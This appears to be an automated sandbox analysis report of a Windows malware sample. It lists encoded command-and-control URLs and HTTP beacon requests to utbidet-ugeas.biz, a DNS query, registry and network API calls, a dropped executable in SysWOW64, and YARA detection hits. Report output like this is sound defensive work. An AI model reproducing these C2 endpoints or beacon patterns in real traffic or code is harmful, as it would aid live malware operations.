Source: olfopeh-outix.exe, 00000001.00000003.570399854.00000000001AB000.00000004.00000020.00020000.00000000.sdmp, olfopeh-outix.exe, 00000001.00000003.559140236.00000000001AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ssgykumyk.st/
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?02083A3281083A3281393A1E81083AAEB981147B18093AF2290A3E04AF3A140BB3380A1
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?020A8DA1850A8DA1853B8D8D850A8D3DBD83A3E81C0B8D612D088997AB38A398B73ABD8
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?020A97C9E70A97C9E73B97E5E70A9755DF83B9807E0B97094F0893FFC938B9F0D53AA7E
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?020C1E43550C1E43553D1E6F550C1EDF6D85300ACC0D1E83FD0E1A757B3E307A673C2E6
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?020CA607B80CA607B83DA62BB80CA69B8085884E210DA6C7100EA231963E883E8A3C962
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?02141BBAD9141BBAD9251B96D9141B26E19D35F340151B7A71161F8CF7263583EB242B9
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?0224A77D0D24A77D0D15A7510D24A7E135AD89349425A7BDA526A34B231689443F14975
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?022502EAE32502EAE31402C6E3250276DBAC2CA37A24022A4B2706DCCD172CD3D11532C
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?02289E4B28289E4B28199E6728289ED710A1B002B1299E8B802A9A7D061AB0721A18AE6
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?022E11CAC92E11CAC91F11E6C92E1156F1A73F83502F110A612C15FCE71C3FF3FB1E21E
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?02380640623806406209066C623806DC5AB12809FB390680CA3A02764C0A28795008366
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?0259DEF0B359DEF0B368DEDCB359DE6C8BD0F0B92A58DE301B5BDAC69D6BF0C98169EED
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?025C9DA2735C9DA2736D9D8E735C9D3E4BD5B3EBEA5D9D62DB5E99945D6EB39B416CAD8
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?0270CC764670CC764641CC5A4670CCEA7EF9E23FDF71CCB6EE72C8406842E24F7440FC5
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?027A3A75947A3A75944B3A59947A3AE9ACF3143C0D7B3AB53C783E43BA48144CA64A0A5
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?02885B61A6885B61A6B95B4DA6885BFD9E0175283F895BA10E8A5F5788BA755894B86B4
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?028E21AF728E21AF72BF2183728E21334A070FE6EB8F216FDA8C25995CBC0F9640BE118
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?0290EC449890EC4498A1EC689890ECD8A019C20D0191EC843092E872B6A2C27DAAA0DC6
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?02AC7D265AAC7D265A9D7D0A5AAC7DBA6225536FC3AD7DE6F2AE7910749E531F689C4D0
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?02B6E63A40B6E63A4087E61640B6E6A6783FC873D9B7E6FAE8B4E20C6E84C8037286D61
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?02CCB3E1F2CCB3E1F2FDB3CDF2CCB37DCA459DA86BCDB3215ACEB7D7DCFE9DD8C0FC83C
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?02CDBC4B4FCDBC4B4FFCBC674FCDBCD777449202D6CCBC8BE7CFB87D61FF92727DFD8C6
Source: olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/N?02DF53E35ADF53E35AEE53CF5ADF537F62567DAAC3DE5323F2DD57D574ED7DDA68EF63C
Source: KJEfMLiuRS.exe, KJEfMLiuRS.exe, 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmp, olfopeh-outix.exe, olfopeh-outix.exe, 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/cc
Source: KJEfMLiuRS.exe, KJEfMLiuRS.exe, 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmp, olfopeh-outix.exe, olfopeh-outix.exe, 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/rpt?
Source: KJEfMLiuRS.exe, 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmp, olfopeh-outix.exe, 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: http://utbidet-ugeas.biz/d/rpt?http://%s.biz/d/G?http://%s.biz/d/N?ntdbg.exeidbg32.exeahuy.exeaset32
Source: explorer.exe, 00000004.00000000.402926439.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.335172353.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.371940609.0000000008260000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J

Source: unknown

DNS traffic detected: queries for: curipbeqyczvl.st

Source: C:\Users\user\Desktop\KJEfMLiuRS.exe

Code function: 0_2_0040265F RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegQueryValueExA,GetSystemTimeAsFileTime,RegSetValueExA,RegSetValueExA,GetIpAddrTable,GetIpAddrTable,wsprintfA,lstrlen,lstrcpy,wsprintfA,wsprintfA,ExitProcess,InternetReadFile,GetSystemTimeAsFileTime,RegSetValueExA,RegSetValueExA,RegCreateKeyExA,RegSetValueExA,RegCloseKey,RegSetValueExA,RegSetValueExA,Sleep,CreateThread,CloseHandle,GetSystemTimeAsFileTime,RegSetValueExA,RegSetValueExA,Sleep,

0_2_0040265F

Source: global traffic	HTTP traffic detected: GET /d/N?020A97C9E70A97C9E73B97E5E70A9755DF83B9807E0B97094F0893FFC938B9F0D53AA7E7E7 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?020A97C9E70A97C9E73B97E5E70A9755DF83B9807E0B97094F0893FFC938B9F0D53AA7E7E7 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?0224A77D0D24A77D0D15A7510D24A7E135AD89349425A7BDA526A34B231689443F1497530D HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?0224A77D0D24A77D0D15A7510D24A7E135AD89349425A7BDA526A34B231689443F1497530D HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?02B6E63A40B6E63A4087E61640B6E6A6783FC873D9B7E6FAE8B4E20C6E84C8037286D61440 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?02B6E63A40B6E63A4087E61640B6E6A6783FC873D9B7E6FAE8B4E20C6E84C8037286D61440 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?025C9DA2735C9DA2736D9D8E735C9D3E4BD5B3EBEA5D9D62DB5E99945D6EB39B416CAD8C73 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?025C9DA2735C9DA2736D9D8E735C9D3E4BD5B3EBEA5D9D62DB5E99945D6EB39B416CAD8C73 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?020C1E43550C1E43553D1E6F550C1EDF6D85300ACC0D1E83FD0E1A757B3E307A673C2E6D55 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?020C1E43550C1E43553D1E6F550C1EDF6D85300ACC0D1E83FD0E1A757B3E307A673C2E6D55 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?027A3A75947A3A75944B3A59947A3AE9ACF3143C0D7B3AB53C783E43BA48144CA64A0A5B94 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?027A3A75947A3A75944B3A59947A3AE9ACF3143C0D7B3AB53C783E43BA48144CA64A0A5B94 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?02289E4B28289E4B28199E6728289ED710A1B002B1299E8B802A9A7D061AB0721A18AE6528 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?02289E4B28289E4B28199E6728289ED710A1B002B1299E8B802A9A7D061AB0721A18AE6528 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?02CCB3E1F2CCB3E1F2FDB3CDF2CCB37DCA459DA86BCDB3215ACEB7D7DCFE9DD8C0FC83CFF2 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?02CCB3E1F2CCB3E1F2FDB3CDF2CCB37DCA459DA86BCDB3215ACEB7D7DCFE9DD8C0FC83CFF2 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?02083A3281083A3281393A1E81083AAEB981147B18093AF2290A3E04AF3A140BB3380A1C81 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?02083A3281083A3281393A1E81083AAEB981147B18093AF2290A3E04AF3A140BB3380A1C81 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?02DF53E35ADF53E35AEE53CF5ADF537F62567DAAC3DE5323F2DD57D574ED7DDA68EF63CD5A HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?02DF53E35ADF53E35AEE53CF5ADF537F62567DAAC3DE5323F2DD57D574ED7DDA68EF63CD5A HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?0259DEF0B359DEF0B368DEDCB359DE6C8BD0F0B92A58DE301B5BDAC69D6BF0C98169EEDEB3 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?0259DEF0B359DEF0B368DEDCB359DE6C8BD0F0B92A58DE301B5BDAC69D6BF0C98169EEDEB3 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?02141BBAD9141BBAD9251B96D9141B26E19D35F340151B7A71161F8CF7263583EB242B94D9 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?02141BBAD9141BBAD9251B96D9141B26E19D35F340151B7A71161F8CF7263583EB242B94D9 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?028E21AF728E21AF72BF2183728E21334A070FE6EB8F216FDA8C25995CBC0F9640BE118172 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?028E21AF728E21AF72BF2183728E21334A070FE6EB8F216FDA8C25995CBC0F9640BE118172 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?0290EC449890EC4498A1EC689890ECD8A019C20D0191EC843092E872B6A2C27DAAA0DC6A98 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?0290EC449890EC4498A1EC689890ECD8A019C20D0191EC843092E872B6A2C27DAAA0DC6A98 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?020CA607B80CA607B83DA62BB80CA69B8085884E210DA6C7100EA231963E883E8A3C9629B8 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?020CA607B80CA607B83DA62BB80CA69B8085884E210DA6C7100EA231963E883E8A3C9629B8 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?02885B61A6885B61A6B95B4DA6885BFD9E0175283F895BA10E8A5F5788BA755894B86B4FA6 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?02885B61A6885B61A6B95B4DA6885BFD9E0175283F895BA10E8A5F5788BA755894B86B4FA6 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?02380640623806406209066C623806DC5AB12809FB390680CA3A02764C0A28795008366E62 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?02380640623806406209066C623806DC5AB12809FB390680CA3A02764C0A28795008366E62 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?0270CC764670CC764641CC5A4670CCEA7EF9E23FDF71CCB6EE72C8406842E24F7440FC5846 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?0270CC764670CC764641CC5A4670CCEA7EF9E23FDF71CCB6EE72C8406842E24F7440FC5846 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?020A8DA1850A8DA1853B8D8D850A8D3DBD83A3E81C0B8D612D088997AB38A398B73ABD8F85 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?020A8DA1850A8DA1853B8D8D850A8D3DBD83A3E81C0B8D612D088997AB38A398B73ABD8F85 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?02AC7D265AAC7D265A9D7D0A5AAC7DBA6225536FC3AD7DE6F2AE7910749E531F689C4D085A HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?02AC7D265AAC7D265A9D7D0A5AAC7DBA6225536FC3AD7DE6F2AE7910749E531F689C4D085A HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?022E11CAC92E11CAC91F11E6C92E1156F1A73F83502F110A612C15FCE71C3FF3FB1E21E4C9 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?022E11CAC92E11CAC91F11E6C92E1156F1A73F83502F110A612C15FCE71C3FF3FB1E21E4C9 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?022502EAE32502EAE31402C6E3250276DBAC2CA37A24022A4B2706DCCD172CD3D11532C4E3 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?022502EAE32502EAE31402C6E3250276DBAC2CA37A24022A4B2706DCCD172CD3D11532C4E3 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/N?02CDBC4B4FCDBC4B4FFCBC674FCDBCD777449202D6CCBC8BE7CFB87D61FF92727DFD8C654F HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global traffic	HTTP traffic detected: GET /d/N?02CDBC4B4FCDBC4B4FFCBC674FCDBCD777449202D6CCBC8BE7CFB87D61FF92727DFD8C654F HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache

Source: KJEfMLiuRS.exe, 00000000.00000002.313800106.000000000066A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: KJEfMLiuRS.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: KJEfMLiuRS.exe, type: SAMPLE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.2.olfopeh-outix.exe.408840.2.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.KJEfMLiuRS.exe.408840.2.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.2.olfopeh-outix.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.2.olfopeh-outix.exe.408840.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.KJEfMLiuRS.exe.408840.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.2.olfopeh-outix.exe.407b20.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 2.2.olfopeh-outix.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.2.KJEfMLiuRS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 2.0.olfopeh-outix.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0.0.KJEfMLiuRS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.olfopeh-outix.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.2.olfopeh-outix.exe.4072a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000000.313533493.0000000000401000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: 00000001.00000003.314102961.000000000013B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: 00000001.00000003.382741035.0000000000136000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: 00000002.00000000.314055233.0000000000401000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: 00000000.00000000.312972922.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: 00000001.00000003.361259093.0000000000121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: 00000001.00000003.361204738.000000000013B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: 00000001.00000003.382705490.0000000000136000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: 00000001.00000003.382800704.0000000000136000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: 00000001.00000003.361292004.0000000000132000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: 00000002.00000002.579508394.0000000000401000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: C:\Windows\SysWOW64\atgusoon-odeas.exe, type: DROPPED	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: C:\Users\user\AppData\Roaming\tmp1D9F.tmp, type: DROPPED	Matched rule: SUSP_Two_Byte_XOR_PE_And_MZ author = Wesley Shields <wxs@atarininja.org>, description = Look for 2 byte xor of a PE starting at offset 0, score = 2021-10-11, reference = https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83
